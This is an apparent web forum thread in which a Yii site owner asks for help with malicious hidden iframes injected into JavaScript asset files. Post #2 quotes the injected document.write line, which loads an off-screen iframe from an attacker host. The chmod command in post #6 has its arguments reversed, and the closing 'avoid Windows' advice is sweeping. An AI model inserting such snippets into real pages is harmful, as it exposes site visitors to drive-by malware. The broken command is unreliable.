Yii Framework Forum: Urgent, Iframes Being Inserted Into Yii Extensions - Yii Framework Forum

Jump to content

Page 1 of 1
  • You cannot start a new topic
  • You cannot reply to this topic

Urgent, Iframes Being Inserted Into Yii Extensions Rate Topic: -----

#1 User is offline   Felipe_Moreira 

  • Junior Member
  • Pip
  • Yii
  • Group: Members
  • Posts: 71
  • Joined: 01-December 11

Posted 10 December 2012 - 08:10 AM

Hi guys. A Few days ago, my site was detected by google as disseminator of malware with a red screen and if the user wanted to continue anyway or not. I found the tool "Webmasters tools" and added my site. That tool found me that file that was detected as threat and was the jnotify.js(Jnotity extension, inside assets directory).

I looked inside the file and i noticed that there was an iframe at the end of the file with a strange url. So, i exclude the extension because i was not using and i asked google a review and the problem was solved. But, many users were sending me email that the anti-virus was detecting threats in many js files inside the asses diretory.

I looked inside them and again i noticed that there was an iframe at the end of the file but with google url "http://google.com", so i removed all iframes inside the files but that iframes at the end of the files appeared again so i exclude all directory inside the asses diretory and apparently the problem was solved.

Today, i receive and email with the diagnosis of the anti-virus showing the same files was detected as threat at second time. The url with iframes is: http://cvrtyi.ddns.info.

I dont know what or who are entering these malicious iframes end of javascript files in the folder assets. Please, someone help me to solve this problem.

Thanks
0

#2 User is offline   Felipe_Moreira 

  • Junior Member
  • Pip
  • Yii
  • Group: Members
  • Posts: 71
  • Joined: 01-December 11

Posted 10 December 2012 - 08:16 AM

Just to add information. This is the code being entered:

document.write('<iframe width="10" height="10" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://byiegfs.ddns.info/nighttrend.cgi?8"></iframe>  ');

0

#3 User is offline   JCJ 

  • Junior Member
  • Pip
  • Yii
  • Group: Members
  • Posts: 20
  • Joined: 19-November 12

Posted 10 December 2012 - 11:36 PM

This is a hidden iframe "injection" attack. Validate your file permissions are correct and also that your FTP credentials have not been compromised. The last time I dealt with this the FTP account credentials were compromised and the files were being modified that way. There are other ways this could be happening, but that is the most likely. Check your logs to confirm.
0

#4 User is offline   Felipe_Moreira 

  • Junior Member
  • Pip
  • Yii
  • Group: Members
  • Posts: 71
  • Joined: 01-December 11

Posted 11 December 2012 - 06:10 AM

Ok.

Thank you very much!
0

#5 User is offline   Felipe_Moreira 

  • Junior Member
  • Pip
  • Yii
  • Group: Members
  • Posts: 71
  • Joined: 01-December 11

Posted 11 December 2012 - 06:16 AM

The problem that the assets diretory need permission to write and it is precisely in this directory that the files are being modified. The octavel this directory is set as: rwxrwxrwx.

That´s right?
0

#6 User is offline   faridplus 

  • Junior Member
  • Pip
  • Yii
  • Group: Members
  • Posts: 93
  • Joined: 28-March 12

Posted 11 December 2012 - 11:59 AM

View PostFelipe_Moreira, on 11 December 2012 - 06:16 AM, said:

The problem that the assets diretory need permission to write and it is precisely in this directory that the files are being modified. The octavel this directory is set as: rwxrwxrwx.

That´s right?


What do you mean it needs permission to write?! Your users don't have to have write access to this directory. You should change its permission to rwxr-xr-x. If your host is linux then you can run this command to make that happen:
chmod -R assets 755
What you give is what you get (WYGIWYG)

If you liked my post, just give it a +1. that's all!
1

#7 User is offline   Felipe_Moreira 

  • Junior Member
  • Pip
  • Yii
  • Group: Members
  • Posts: 71
  • Joined: 01-December 11

Posted 18 December 2012 - 02:31 PM

Hi guys. I solved the problem changing all passwords the ftp client and the permissions the app files. I deleted the app that was in production and i uploaded another clean one. Never more i will use Microsoft windows again, because my pc was infected by a trojan that caused this nightmare. My tip is, do not use microsoft windows computers that access the application server.

Thank you guys for your replies.
0

Share this topic:


Page 1 of 1
  • You cannot start a new topic
  • You cannot reply to this topic

1 User(s) are reading this topic
0 members, 1 guests, 0 anonymous users